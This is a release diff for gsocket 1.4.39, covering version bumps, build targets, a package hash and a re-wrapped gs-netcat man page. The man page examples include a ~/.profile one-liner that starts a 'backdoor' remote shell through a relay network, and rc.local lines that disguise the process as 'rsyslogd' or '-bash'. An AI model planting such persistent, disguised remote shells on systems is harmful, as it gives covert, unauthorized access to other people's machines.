v1.4.39

ChangeLog

@@ -1,4 +1,4 @@
-1.4.39-dev - 2022-09-01
+1.4.39 - 2022-09-01
     * -t flag to check if peer is listening
     * Software emulation of PTY if /dev/ptmx is unavailable
     * Keepalive improved for Port 443 connections

configure.ac

@@ -1,6 +1,6 @@
 dnl Process this File with autoconf to produce a configure script.
 AC_PREREQ([2.69])
-AC_INIT([gsocket],[1.4.39-dev4])
+AC_INIT([gsocket],[1.4.39])
 AC_CONFIG_AUX_DIR(config)
 AC_CANONICAL_TARGET
 
@@ -241,7 +241,7 @@ if test x"${STATIC}" = xyes; then
 * Your MUST compile OpenSSL like this:                                       *
 * openssl-src>                                                               *
 * ./Configure --prefix=\$HOME/usr no-dso no-threads no-shared linux-generic64 * 
-* mkdir -p \$HOME/usr && make all install                                     *
+* mkdir -p \$HOME/usr && make install_sw                                      *
 * Only then compile gsocket \(using the same --prefix=\):                    *
 * gsocket-src> ./configure --prefix=\$HOME/usr --enable-static                *
 * gsocket-src> make all install                                              *

deploy/deploy.sh

@@ -562,7 +562,8 @@ init_vars()
 		elif [[ $OSTYPE == *FreeBSD* ]]; then
 				OSARCH="x86_64-freebsd"
 		elif [[ $OSTYPE == *cygwin* ]]; then
-				OSARCH="x86_64-cygwin"
+			OSARCH="i686-cygwin"
+			[[ "$arch" == "x86_64" ]] && OSARCH="x86_64-cygwin"
 		# elif [[ $OSTYPE == *gnu* ]] && [[ "$(uname -v)" == *Hurd* ]]; then
 				# OSARCH="i386-hurd" # debian-hurd
 		fi
@@ -1356,7 +1357,7 @@ try()
 # binaries and fail hard if none could be found.
 try_any()
 {
-	targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-cygwin x86_64-freebsd x86_64-osx"
+	targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-osx x86_64-cygwin i686-cygwin mips32-alpine mipsel32-alpine x86_64-freebsd"
 	for osarch in $targets; do
 		[[ "$osarch" = "$OSARCH" ]] && continue # Skip the default OSARCH (already tried)
 		try "$osarch"

packaging/deploy-all/mk_deploy-all.sh

@@ -7,7 +7,7 @@
 BASEDIR="$(cd "$(dirname "${0}")/../../" || exit; pwd)"
 source "${BASEDIR}/packaging/build_funcs"
 
-targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-cygwin x86_64-freebsd x86_64-osx mips32-alpine mips64-alpine mipsel32-alpine"
+targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-osx x86_64-cygwin i686-cygwin mips64-alpine mips32-alpine mipsel32-alpine x86_64-freebsd"
 # targets="x86_64-alpine x86_64-osx"
 
 PKG_DIR="gs-pkg"

packaging/openwrt/gsocket/Makefile

@@ -1,12 +1,12 @@
 include $(TOPDIR)/rules.mk
 
 PKG_NAME:=gsocket
-PKG_VERSION:=1.4.39-dev3
+PKG_VERSION:=1.4.39
 PKG_RELEASE:=1
 
 PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.gz
 PKG_SOURCE_URL:=https://github.com/hackerschoice/gsocket/releases/download/v$(PKG_VERSION)/
-PKG_HASH:=240ee6f4b00d4e5e6de88b488c4a2982771343ad23fe6dddb6671d82d06127fc
+PKG_HASH:=2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30
 
 PKG_MAINTAINER:=Ralf Kaiser <skyper@thc.org>
 PKG_LICENSE:=BSD-2-Clause

test-build/test-compile.sh

@@ -23,7 +23,7 @@ DIR=$(echo "$FILE" | sed 's/\.tar\.gz//')
 echo "Using:"
 (cd "${TOPDIR}" && ls -al "$FILE" && sha256sum "$FILE")
 
-targets+=("osx")
+# targets+=("osx")
 targets+=("sid")
 targets+=("cygwin")
 targets+=("kali64")
@@ -32,7 +32,8 @@ targets+=("arch32")
 targets+=("alpine64")
 targets+=("debian" "ubuntu")
 targets+=("centos" "linux32")
-targets+=("fbsd" "bengal")
+targets+=("fbsd")
+targets+=("bengal")
 targets+=("rpi")
 targets+=("solaris11" "solaris10")
 targets+=("openwrt")

tools/man_gs-netcat.h

@@ -1,9 +1,9 @@
 const char *man_str = "\
-GS-NETCAT(1)		     General Commands Manual		    GS-NETCAT(1)\n\
+GS-NETCAT(1)		    General Commands Manual		  GS-NETCAT(1)\n\
 \n\
 NAME\n\
-     gs-netcat – transfer data, forward traffic and execute commands on a remote\n\
-     host. Securely.\n\
+     gs-netcat – transfer data, forward traffic and execute commands on a\n\
+     remote host. Securely.\n\
 \n\
 SYNOPSIS\n\
      gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]\n\
@@ -17,11 +17,11 @@ DESCRIPTION\n\
      workstation and another workstation on a different Local Area Network.\n\
 \n\
      It uses the Global Socket Relay Network (GSRN) instead of direct TCP\n\
-     connections. Neither workstation needs to open a port in their firewall or\n\
-     accept incoming TCP connections.\n\
+     connections. Neither workstation needs to open a port in their firewall\n\
+     or accept incoming TCP connections.\n\
 \n\
-     The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256 and\n\
-     a 4096 Prime. The GSRN sees only the encrypted traffic.\n\
+     The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256\n\
+     and a 4096 Prime. The GSRN sees only the encrypted traffic.\n\
 \n\
      Common uses include:\n\
 \n\
@@ -36,18 +36,20 @@ OPTIONS\n\
 \n\
      -d ip   Destination IPv4 address for port forwarding.\n\
 \n\
-     -D      Daemon & Watchdog mode. Start gs-netcat as a background process and\n\
-	     restart if killed.\n\
+     -D      Daemon & Watchdog mode. Start gs-netcat as a background process\n\
+	     and restart if killed.\n\
 \n\
-     -e cmd  Execute command and send output to the connected client. Needs -l.\n\
+     -e cmd  Execute command and send output to the connected client. Needs\n\
+	     -l.\n\
 \n\
-     -g      Generate a secure random password and output it to standard output.\n\
+     -g      Generate a secure random password and output it to standard\n\
+	     output.\n\
 \n\
-     -i      Interactive login shell. The server spawns a true PTY login shell.\n\
-	     The client acts as a true PTY client (with Ctrl-C etc working). The\n\
-	     client can terminate the session by typing 'Ctrl-e q' at any time\n\
-	     or by typing 'exit'. The server supports multiple clients at the\n\
-	     same time.\n\
+     -i      Interactive login shell. The server spawns a true PTY login\n\
+	     shell. The client acts as a true PTY client (with Ctrl-C etc\n\
+	     working). The client can terminate the session by typing 'Ctrl-e\n\
+	     q' at any time or by typing 'exit'. The server supports multiple\n\
+	     clients at the same time.\n\
 \n\
      -k file\n\
 	     A file containing the password.\n\
@@ -62,8 +64,8 @@ OPTIONS\n\
 \n\
      -q      Quiet mode. Do not output any warnings or errors.\n\
 \n\
-     -r      Receive-only. Do not send any data. Terminate when no more data is\n\
-	     available for reading.\n\
+     -r      Receive-only. Do not send any data. Terminate when no more data\n\
+	     is available for reading.\n\
 \n\
      -s secret\n\
 	     A password chosen by the user. Both users need to use the same\n\
@@ -73,9 +75,9 @@ OPTIONS\n\
 	     proxy. It allows multiple gs-netcat clients to (securely) relay\n\
 	     traffic via the server. Needs -l.\n\
 \n\
-     -T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN. This\n\
-	     requires TOR to be installed and running. The IP and PORT of the\n\
-	     TOR server can be set using environment variables.\n\
+     -T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN.\n\
+	     This requires TOR to be installed and running. The IP and PORT of\n\
+	     the TOR server can be set using environment variables.\n\
 \n\
      -t      Connect to the GSRN (only) and check if the peer is listening. Do\n\
 	     not connect the peer.\n\
@@ -88,9 +90,9 @@ OPTIONS\n\
      -w      Client to wait for the listening server to become available.\n\
 \n\
 CONSOLE\n\
-     The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-e\n\
-     c' (e for EEEElite) opens the command console. The command console displays\n\
-     the following information:\n\
+     The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-\n\
+     e c' (e for EEEElite) opens the command console. The command console\n\
+     displays the following information:\n\
 \n\
 	   •   Latency (in milliseconds) to the remote host\n\
 	   •   Warning when a user logs into the system or becomes active\n\
@@ -99,30 +101,30 @@ CONSOLE\n\
      Type 'help' for a list of available commands.\n\
 \n\
 FILETRANSFER\n\
-     File transfer is available from the command console. Files are transferred\n\
-     with the permission and modification timestamp unchanged. Partially\n\
-     transferred files are re-started where the transfer was left off.	The\n\
-     'put' command is used for uploading:\n\
+     File transfer is available from the command console. Files are\n\
+     transferred with the permission and modification timestamp unchanged.\n\
+     Partially transferred files are re-started where the transfer was left\n\
+     off.  The 'put' command is used for uploading:\n\
 	   put foobar.txt\n\
 	   put $HOME/foobar.txt\n\
 	   put /tmp/*.log\n\
 	   put $(find. -type f -name '*.c')\n\
-     (The above example shows Shell Variable substitution and word expansion) It\n\
-     is possible to limit the amount of path information that is sent as implied\n\
-     directories for each path you specify. You can insert a dot and a slash\n\
-     into the source path, like this:\n\
+     (The above example shows Shell Variable substitution and word expansion)\n\
+     It is possible to limit the amount of path information that is sent as\n\
+     implied directories for each path you specify. You can insert a dot and a\n\
+     slash into the source path, like this:\n\
 	   put /foo/./bar/baz.c\n\
-     That would create /tmp/bar/baz.c on the remote machine.  The 'get' command\n\
-     is used for downloading:\n\
+     That would create /tmp/bar/baz.c on the remote machine.  The 'get'\n\
+     command is used for downloading:\n\
 	   get foobar.txt\n\
 	   get $(find /var/./ -name '*.log')\n\
-     Transferring a directory automatically transfers all files and directories\n\
-     within that directory (recursively):\n\
+     Transferring a directory automatically transfers all files and\n\
+     directories within that directory (recursively):\n\
 	   get /var/log\n\
 	   get /\n\
      The first command transfers all directories and files in /var/log/*. The\n\
-     latter command transfers the entire filesystem.  Multiple get/put commands\n\
-     can be scheduled at the same time.\n\
+     latter command transfers the entire filesystem.  Multiple get/put\n\
+     commands can be scheduled at the same time.\n\
 \n\
 EXAMPLES\n\
      Example 1 - Listen for a new connection using the password 'MySecret':\n\
@@ -167,8 +169,8 @@ EXAMPLES\n\
      Example 6 - TCP Port Forward all connections to 192.168.6.7:22. Server:\n\
 	   $ gs-netcat -s MySecret -l -d 192.168.6.7 -p 22\n\
 \n\
-     Client to listen on TCP port 2222 and forward any new connection to the the\n\
-     server. The server then forwards the connection to 192.168.6.7:22.\n\
+     Client to listen on TCP port 2222 and forward any new connection to the\n\
+     the server. The server then forwards the connection to 192.168.6.7:22.\n\
 	   $ gs-netcat -s MySecret -p 2222\n\
 	   $ ssh -p 2222 root@127.0.0.1\n\
 \n\
@@ -180,8 +182,8 @@ EXAMPLES\n\
 \n\
      The sftp-server binary speaks the sftp-protocol to stdin/stdout. The sftp\n\
      binary also speaks sftp-protocol to stdin/stdout. The tool can be used to\n\
-     connect both via GSRN (encrypted) and access the SFTP server running on the\n\
-     server's side from the client via the GSRN (encrypted).:\n\
+     connect both via GSRN (encrypted) and access the SFTP server running on\n\
+     the server's side from the client via the GSRN (encrypted).:\n\
 	   $ export GSOCKET_ARGS='-s MySecret'\n\
 	   $ sftp -D gs-netcat\n\
 \n\
@@ -195,12 +197,13 @@ EXAMPLES\n\
 	   SHELL=\"/bin/bash\" /bin/bash -c \"cd $HOME; exec -a rsyslogd\n\
 	   /usr/local/bin/gs-netcat\"\n\
 \n\
-     The following line in /etc/rc.local starts a port-forward to 127.0.0.1:22:\n\
-	   GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec -a\n\
-	   rsyslogd /usr/local/bin/gs-netcat\"\n\
+     The following line in /etc/rc.local starts a port-forward to\n\
+     127.0.0.1:22:\n\
+	   GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec\n\
+	   -a rsyslogd /usr/local/bin/gs-netcat\"\n\
 \n\
-     The following line in the user's ~/.profile starts the backdoor (once) when\n\
-     the user logs in. All in one line:\n\
+     The following line in the user's ~/.profile starts the backdoor (once)\n\
+     when the user logs in. All in one line:\n\
 	   killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s MySecret3\n\
 	   -liqD\" SHELL=/bin/bash exec -a -bash /usr/local/bin/gs-netcat)\n\
 \n\
@@ -216,8 +219,8 @@ ENVIRONMENT\n\
      gs-netcat\n\
 \n\
      GSOCKET_SOCKS_IP\n\
-	   Specify the IP address of the TOR server (or any other SOCKS server).\n\
-	   Use together with -T. Default is 127.0.0.1.\n\
+	   Specify the IP address of the TOR server (or any other SOCKS\n\
+	   server). Use together with -T. Default is 127.0.0.1.\n\
 \n\
      GSOCKET_SOCKS_PORT\n\
 	   The port number of the TOR server (or any other SOCKS server). Use\n\
@@ -237,34 +240,35 @@ SECURITY\n\
 	   $ export GSOCKET_ARGS=\"-s MySecret\"\n\
 	   $ gs-netcat\n\
 \n\
-     1. The security is end-2-end. This means from User-2-User (and not just to\n\
-     the GSRN). The GSRN relays only (encrypted) data to and from the users.\n\
+     1. The security is end-2-end. This means from User-2-User (and not just\n\
+     to the GSRN). The GSRN relays only (encrypted) data to and from the\n\
+     users.\n\
 \n\
-     2. The session is 256 bit and ephemeral. It is freshly generated for every\n\
-     session and generated randomly (and is not based on the password). It uses\n\
-     OpenSSL's SRP with AES-256 and a 4096 Prime.\n\
+     2. The session is 256 bit and ephemeral. It is freshly generated for\n\
+     every session and generated randomly (and is not based on the password).\n\
+     It uses OpenSSL's SRP with AES-256 and a 4096 Prime.\n\
 \n\
      3. The password can be 'weak' without weakening the security of the\n\
      session. A brute force attack against a weak password requires a new TCP\n\
      connection for every guess.\n\
 \n\
      4. Do not use stupid passwords like 'password123'. Malice might pick the\n\
-     same (stupid) password by chance and connect. If in doubt use gs-netcat -g\n\
-     to generate a strong one. Alice's and Bob's password should at least be\n\
-     strong enough so that Malice can not guess it by chance while Alice is\n\
+     same (stupid) password by chance and connect. If in doubt use gs-netcat\n\
+     -g to generate a strong one. Alice's and Bob's password should at least\n\
+     be strong enough so that Malice can not guess it by chance while Alice is\n\
      waiting for Bob to connect.\n\
 \n\
-     5. If Alice shares the same password with Bob and Charlie and either one of\n\
-     them connects then Alice can not tell if it is Bob or Charlie who\n\
+     5. If Alice shares the same password with Bob and Charlie and either one\n\
+     of them connects then Alice can not tell if it is Bob or Charlie who\n\
      connected.\n\
 \n\
      6. Assume Alice shares the same password with Bob and Malice. When Alice\n\
-     stops listening for a connection then Malice could start to listen for the\n\
-     connection instead. Bob (when opening a new connection) can not tell if he\n\
-     is connecting to Alice or to Malice. Use -a <token> if you worry about\n\
-     this. TL;DR: When sharing the same password with a group larger than 2 then\n\
-     it is assumed that everyone in that group plays nicely. Otherwise use SSH\n\
-     over the GS/TLS connection.\n\
+     stops listening for a connection then Malice could start to listen for\n\
+     the connection instead. Bob (when opening a new connection) can not tell\n\
+     if he is connecting to Alice or to Malice. Use -a <token> if you worry\n\
+     about this. TL;DR: When sharing the same password with a group larger\n\
+     than 2 then it is assumed that everyone in that group plays nicely.\n\
+     Otherwise use SSH over the GS/TLS connection.\n\
 \n\
      7. SRP has Perfect Forward Secrecy. This means that past sessions can not\n\
      be decrypted even if the password becomes known.\n\
@@ -282,5 +286,5 @@ BUGS\n\
      whatever circumstances, please notify me (skyper@thc.org) and tell me how\n\
      you think it should behave.\n\
 \n\
-macOS 12.5			 October 8, 2020		      macOS 12.5\n\
+macOS 13.0			October 8, 2020 		    macOS 13.0\n\
 ";